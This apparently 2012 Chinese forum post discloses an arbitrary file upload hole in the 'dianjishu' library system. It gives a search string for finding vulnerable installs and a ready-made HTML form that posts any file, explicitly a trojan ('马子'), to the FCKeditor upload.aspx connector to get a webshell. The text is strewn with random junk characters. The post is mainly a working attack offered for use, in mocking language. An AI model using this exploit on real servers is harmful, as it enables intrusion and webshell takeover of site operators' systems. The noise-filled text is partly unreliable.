主题:图书馆系统任意文件上传漏洞$ @/ X: B: m9 u& k8 b: A
作者:冰锋刺客
( h+ F9 L5 ]* J9 B 厂商:点击书(dianjishu.com)5 l' a# I9 ~; r5 c. C9 H
日期:2012-6-21
4 B5 @6 t+ p$ I7 Q , v, S1 g! P% m6 c# G' s9 h" b2 J
I 概述
, \4 E! M7 L4 ?0 l* ?' k( y% s 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
: y8 R3 ]& i7 ~8 C II 简介
: B g- ` O, \. ]/ S 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"8 k9 b+ ^6 o% V& D, v; b5 K+ u
补充一个漏洞* o! G1 o- P) R: G* g6 }8 ^
<form id="frmUpload" enctype="multipart/form-data"% |4 z$ H+ i' g3 j
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>5 [% d9 S0 j& `4 B: |# g
<input id="btnUpload" type="submit" value="操翻他">3 `9 o% u* g: [' m* f3 k/ }( `& W1 V
</form># p5 x/ X, p% {7 l4 [1 k& T
你们懂的7 f, S; {+ w, V: [! e9 l T
那傻逼提供还需要改包.( l5 S, ? ~$ R' ~1 H0 f7 ~
自己看了下源代码发现fckeditor- |- F8 l5 R" @1 k: o h# ^
直接秒杀7 I+ ~8 d* v5 M! P
|
发表于 2012-9-10 21:20:59
收藏
支持
反对